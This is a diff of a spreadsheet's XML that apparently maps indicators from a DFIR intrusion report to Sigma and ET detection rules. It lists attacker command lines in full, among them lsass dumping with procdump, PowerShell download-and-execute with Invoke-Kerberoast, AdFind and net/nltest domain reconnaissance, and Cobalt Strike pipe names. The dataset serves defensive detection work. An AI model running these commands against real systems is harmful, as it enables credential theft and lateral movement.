+    <t>{"process_command_line": r'''af.exe -f "objectcategory=computer" &gt; ad_computers.txt''',  "initiating_process_commandline": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''af.exe -f "objectcategory=person" &gt; ad_users.txt''', "initiating_process_commandline": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''af.exe -sc trustdmp &gt; trustdmp.txt''', "initiating_process_commandline": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''af.exe  -gcb -sc trustdmp &gt; trustdmp.txt''', "initiating_process_commandline": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C tasklist'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C time /t'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\rundll32.exe'''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0014</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0015</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0016</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0017</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0018</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0019</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0020</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0021</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0022</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0023</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0024</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0025</t>
+  </si>
+  <si>
+    <t>{"file_path": "C:\Users\&lt;user&gt;\AppData\Local\wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "C:\Windows\system32\svchost.exe -k UnistackSvcGroup"}</t>
+  </si>
+  <si>
+    <t>{"pshell_command": "Invoke-Kerberoast"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\REDACTED\ps.txt -append -force -Encoding UTF8"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0026</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0027</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0028</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0029</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0030</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0031</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "whoami", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "ipconfig /all", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "tasklist", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "systeminfo", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "wmic product get name,version", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "wmic /node:&lt;fqdndevice&gt; process list brief", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "net view&lt;fqdndevice&gt;\Files$ /all", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "dir \\&lt;device\C$\", "initiating_process_name": "wab.exe"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0032</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0033</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0034</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0035</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0036</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0037</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0038</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0039</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "net use"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "net group "Domain computers" /dom"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "net group "Enterprise admins" /domain"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "net group "domain admins" /domain"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "net localgroup administrators"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "nltest /dclist:"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "nltest /domain_trusts"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "ping -n 1 &lt;REMOTE_IP&gt;"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0040</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0041</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0042</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0043</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0044</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0045</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0046</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0047</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "C :\Windows\system32\cmd.exe /C shell whoami /all"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''@echo off for /f %%i in (servers.txt) do for /f "tokens=2 delims=[]" %%j in ('ping -n 1 -4 "%%i"') do @echo %%j &gt;&gt; serv.log'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''@echo off ffor /f %%i in (workers.txt) do for /f "tokens=2 delims=[]" %%j in ('ping -n 1 -4 "%%i"') do @echo %%j &gt;&gt; work.log'''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0048</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0049</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0050</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:39303/%27); Invoke-ShareFinder  -CheckShareAccess -Verbose | Tee-Object ShareFinder.txt'''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0051</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0052</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''Seatbelt.exe  -group=all -outputfile="C:\ProgramData\seatinfo.txt"'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''vulnrecon.dll PDB: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\standalone\Release\apphost.pdb'''}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_create", "initiating_process_name": r'''rundll32.exe''', "file_path": r'''C:\ProgramData\ShareFinder.txt'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''vulnrecon.exe PDB: D:\work\rt\VulnRecon\VulnRecon\obj\Release\net5.0\VulnRecon.pdb'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -v''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -o''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -FIndVulnerability''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -i''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -m''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -FIndVulnerability &gt;&gt; c:\programdata\log.txt''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -o &gt;&gt; c:\ProgramData\out.txt''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''VulnRecon.exe -I &gt;&gt; c:\programdata\1.txt''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0053</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0054</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0055</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0056</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0057</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0058</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0059</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0060</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0061</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0062</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0063</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0064</t>
+  </si>
+  <si>
+    <t>{"obj_type": "netcon", "initiating_process_name": "rundll32.exe", "dest_port": "135"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0065</t>
+  </si>
+  <si>
+    <t>Threat actors used the built-in Cobalt Strike jump psexec command to move laterally. On each usage of this feature, a remote service was created with random alphanumeric characters, service name and service file name, e.g. “&lt;7-alphanumeric-characters&gt;.exe”.
+Below is an example of the service edc603a that was created on a Domain Controller:</t>
+  </si>
+  <si>
+    <t>{"service_file_name": r'''"\\&lt;FQDN&gt;\ADMIN$\edc603a.exe'''</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0066</t>
+  </si>
+  <si>
+    <t>Default Named Pipes</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C\users\&lt;user&gt;\AppData\Local\wab.exe''', "pipe_name": r'''\postex_17e9'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C\users\&lt;user&gt;\AppData\Local\wab.exe''', "pipe_name": r'''\postex_320d'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C\users\&lt;user&gt;\AppData\Local\wab.exe''', "pipe_name": r'''\postex_55f8'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C\users\&lt;user&gt;\AppData\Local\wab.exe''', "pipe_name": r'''\postex_972d'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C\users\&lt;user&gt;\AppData\Local\wab.exe''', "pipe_name": r'''\postex_fc2e'''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0067</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0068</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0069</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0070</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0071</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:Windows\Explorer.exe''', "pipe_name": r'''\postex_3e9b'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:Windows\Explorer.exe''', "pipe_name": r'''\postex_8c73'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\rundll32.exe''', "pipe_name": r'''\postex_0dde'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\rundll32.exe''', "pipe_name": r'''\postex_4008'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\rundll32.exe''', "pipe_name": r'''\postex_4429'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\rundll32.exe''', "pipe_name": r'''\postex_8248'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\rundll32.exe''', "pipe_name": r'''\postex_caf4'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\svchost.exe''', "pipe_name": r'''\postex_2356'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\svchost.exe''', "pipe_name": r'''\postex_3508'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\svchost.exe''', "pipe_name": r'''\postex_5e24'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\system32\svchost.exe''', "pipe_name": r'''\postex_956f'''}</t>
+  </si>
+  <si>
+    <t>{"process_path": r'''C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe''', "pipe_name": r'''\postex_c8f3'''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0072</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0073</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0074</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0075</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0076</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0077</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0078</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0079</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0080</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0081</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0082</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0083</t>
+  </si>
+  <si>
+    <t>{"et_rule": "ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent"}</t>
+  </si>
+  <si>
+    <t>{"et_rule": "ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)"}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_create", "file_path": r'''&lt;fqdn&gt;\C$\programdata\AnyDesk (1).exe'''}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "remote_file_create", "file_path": r'''&lt;fqdn&gt;\C$\programdata\AnyDesk (1).exe'''}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_create_on_remote_share", "file_path": r'''&lt;fqdn&gt;\C$\programdata\AnyDesk (1).exe'''}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_modified", "file_path": r'''&lt;fqdn&gt;\C$\programdata\AnyDesk (1).exe'''}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0084</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0085</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0086</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0087</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0088</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0089</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", "sigma_title": "ISO or Image Mount Indicator in Recent Files"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "sigma_title": "ISO Image Mount"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "4ca7c59-e9e4-42d8-bf57-91a776efcb87", "sigma_title": "Rundll32 From Abnormal Drive"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "sigma_title": "Suspicious Encoded PowerShell Command Line"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "sigma_title": "LSASS Memory Dump"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "sigma_title": "Potential Recon Activity Via Nltest.EXE"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "9a132afa-654e-11eb-ae93-0242ac130002", "sigma_title": "AdFind Usage Detection"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "65531a81-a694-4e31-ae04-f8ba5bc33759", "sigma_title": "Suspicious PowerShell Download"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "09576804-7a05-458e-a817-eb718ca91f54", "sigma_title": "Suspicious PowerShell IEX Execution Patterns"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "5a105d34-05fc-401e-8553-272b45c1522d", "sigma_title": "CobaltStrike Service Installations"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", "sigma_title": "Malicious PowerView PowerShell Commandlets"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "sigma_title": "Suspicious Reconnaissance Activity"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", "sigma_title": "Kerberos Network Traffic RC4 Ticket Encryption"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", "sigma_title": "Suspicious Kerberos RC4 Ticket Encryption"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "03795938-1387-481b-9f4c-3f6241e604fe", "sigma_title": "Suspicious Use of Procdump"}</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", "sigma_title": "Use of Anydesk Remote Access Software"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0090</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0091</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0092</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0093</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0094</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0095</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0096</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0097</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0098</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0099</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0100</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0101</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0102</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0103</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0104</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0105</t>
+  </si>
+  <si>
+    <t>ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
+ET POLICY SMB Executable File Transfer
+ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
+ET POLICY SMB2 NT Create AndX Request For an Executable File
+ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)
+ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent
+(Snort VRT) MALWARE-OTHER CobaltStrike powershell web delivery attempt</t>
+  </si>
+  <si>
+    <t>generic</t>
+  </si>
+  <si>
+    <t>sigma</t>
+  </si>
+  <si>
+    <t>et_rule</t>
   </si>
 </sst>
 </file>
@@ -224,8 +813,8 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G12" totalsRowShown="0" dataDxfId="7">
-  <autoFilter ref="A1:G12" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G107" totalsRowShown="0" dataDxfId="7">
+  <autoFilter ref="A1:G107" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
   <tableColumns count="7">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
     <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
@@ -556,10 +1145,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:G12"/>
+  <dimension ref="A1:G107"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="A2" sqref="A2:A12"/>
+    <sheetView tabSelected="1" topLeftCell="A79" workbookViewId="0">
+      <selection activeCell="D85" sqref="D85:D86"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -570,7 +1159,7 @@
     <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
     <col min="5" max="5" width="72.6640625" customWidth="1"/>
     <col min="6" max="6" width="143.33203125" customWidth="1"/>
-    <col min="7" max="7" width="31.5" customWidth="1"/>
+    <col min="7" max="7" width="98.1640625" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1" spans="1:7" x14ac:dyDescent="0.2">
@@ -581,7 +1170,7 @@
         <v>4</v>
       </c>
       <c r="C1" t="s">
-        <v>21</v>
+        <v>14</v>
       </c>
       <c r="D1" t="s">
         <v>3</v>
@@ -593,7 +1182,7 @@
         <v>0</v>
       </c>
       <c r="G1" t="s">
-        <v>19</v>
+        <v>12</v>
       </c>
     </row>
     <row r="2" spans="1:7" ht="34" x14ac:dyDescent="0.2">
@@ -602,7 +1191,7 @@
       </c>
       <c r="B2" s="1"/>
       <c r="C2" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D2" s="1" t="s">
         <v>7</v>
@@ -611,17 +1200,17 @@
         <v>5</v>
       </c>
       <c r="F2" s="1" t="s">
-        <v>8</v>
+        <v>39</v>
       </c>
       <c r="G2" s="1"/>
     </row>
     <row r="3" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A3" s="1" t="s">
-        <v>23</v>
+        <v>16</v>
       </c>
       <c r="B3" s="1"/>
       <c r="C3" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D3" s="1" t="s">
         <v>7</v>
@@ -630,17 +1219,17 @@
         <v>5</v>
       </c>
       <c r="F3" s="1" t="s">
-        <v>9</v>
+        <v>44</v>
       </c>
       <c r="G3" s="1"/>
     </row>
     <row r="4" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A4" s="1" t="s">
-        <v>24</v>
+        <v>17</v>
       </c>
       <c r="B4" s="1"/>
       <c r="C4" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D4" s="1" t="s">
         <v>7</v>
@@ -649,17 +1238,17 @@
         <v>5</v>
       </c>
       <c r="F4" s="1" t="s">
-        <v>10</v>
+        <v>40</v>
       </c>
       <c r="G4" s="1"/>
     </row>
     <row r="5" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A5" s="1" t="s">
-        <v>25</v>
+        <v>18</v>
       </c>
       <c r="B5" s="1"/>
       <c r="C5" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D5" s="1" t="s">
         <v>7</v>
@@ -668,17 +1257,17 @@
         <v>5</v>
       </c>
       <c r="F5" s="1" t="s">
-        <v>11</v>
+        <v>41</v>
       </c>
       <c r="G5" s="1"/>
     </row>
     <row r="6" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A6" s="1" t="s">
-        <v>26</v>
+        <v>19</v>
       </c>
       <c r="B6" s="1"/>
       <c r="C6" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D6" s="1" t="s">
         <v>7</v>
@@ -687,17 +1276,17 @@
         <v>5</v>
       </c>
       <c r="F6" s="1" t="s">
-        <v>12</v>
+        <v>42</v>
       </c>
       <c r="G6" s="1"/>
     </row>
     <row r="7" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A7" s="1" t="s">
-        <v>27</v>
+        <v>20</v>
       </c>
       <c r="B7" s="1"/>
       <c r="C7" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D7" s="1" t="s">
         <v>7</v>
@@ -706,17 +1295,17 @@
         <v>5</v>
       </c>
       <c r="F7" s="1" t="s">
-        <v>13</v>
+        <v>43</v>
       </c>
       <c r="G7" s="1"/>
     </row>
     <row r="8" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A8" s="1" t="s">
-        <v>28</v>
+        <v>21</v>
       </c>
       <c r="B8" s="1"/>
       <c r="C8" s="1" t="s">
-        <v>22</v>
+        <v>15</v>
       </c>
       <c r="D8" s="1" t="s">
         <v>7</v>
@@ -725,71 +1314,1692 @@
         <v>5</v>
       </c>
       <c r="F8" s="1" t="s">
-        <v>14</v>
+        <v>38</v>
       </c>
       <c r="G8" s="1"/>
     </row>
     <row r="9" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A9" s="1" t="s">
-        <v>29</v>
+        <v>22</v>
       </c>
       <c r="B9" s="1"/>
       <c r="C9" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="D9" s="1"/>
-      <c r="E9" s="1"/>
+        <v>15</v>
+      </c>
+      <c r="D9" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E9" s="1" t="s">
+        <v>5</v>
+      </c>
       <c r="F9" s="1" t="s">
-        <v>15</v>
+        <v>8</v>
       </c>
       <c r="G9" s="1"/>
     </row>
     <row r="10" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A10" s="1" t="s">
-        <v>30</v>
+        <v>23</v>
       </c>
       <c r="B10" s="1"/>
       <c r="C10" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="D10" s="1"/>
-      <c r="E10" s="1"/>
+        <v>15</v>
+      </c>
+      <c r="D10" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E10" s="1" t="s">
+        <v>5</v>
+      </c>
       <c r="F10" s="1" t="s">
-        <v>16</v>
+        <v>9</v>
       </c>
       <c r="G10" s="1"/>
     </row>
     <row r="11" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A11" s="1" t="s">
-        <v>31</v>
+        <v>24</v>
       </c>
       <c r="B11" s="1"/>
       <c r="C11" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="D11" s="1"/>
-      <c r="E11" s="1"/>
+        <v>15</v>
+      </c>
+      <c r="D11" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E11" s="1" t="s">
+        <v>5</v>
+      </c>
       <c r="F11" s="1" t="s">
-        <v>17</v>
+        <v>10</v>
       </c>
       <c r="G11" s="1"/>
     </row>
     <row r="12" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A12" s="1" t="s">
-        <v>32</v>
+        <v>25</v>
       </c>
       <c r="B12" s="1"/>
       <c r="C12" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="D12" s="1"/>
-      <c r="E12" s="1"/>
+        <v>15</v>
+      </c>
+      <c r="D12" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E12" s="1" t="s">
+        <v>5</v>
+      </c>
       <c r="F12" s="1" t="s">
-        <v>18</v>
+        <v>11</v>
       </c>
       <c r="G12" s="1" t="s">
-        <v>20</v>
-      </c>
+        <v>13</v>
+      </c>
+    </row>
+    <row r="13" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A13" s="1" t="s">
+        <v>28</v>
+      </c>
+      <c r="B13" s="1"/>
+      <c r="C13" s="1"/>
+      <c r="D13" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E13" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F13" s="1" t="s">
+        <v>26</v>
+      </c>
+      <c r="G13" s="1"/>
+    </row>
+    <row r="14" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A14" s="1" t="s">
+        <v>29</v>
+      </c>
+      <c r="B14" s="1"/>
+      <c r="C14" s="1"/>
+      <c r="D14" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E14" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F14" s="1" t="s">
+        <v>27</v>
+      </c>
+      <c r="G14" s="1"/>
+    </row>
+    <row r="15" spans="1:7" ht="34" x14ac:dyDescent="0.2">
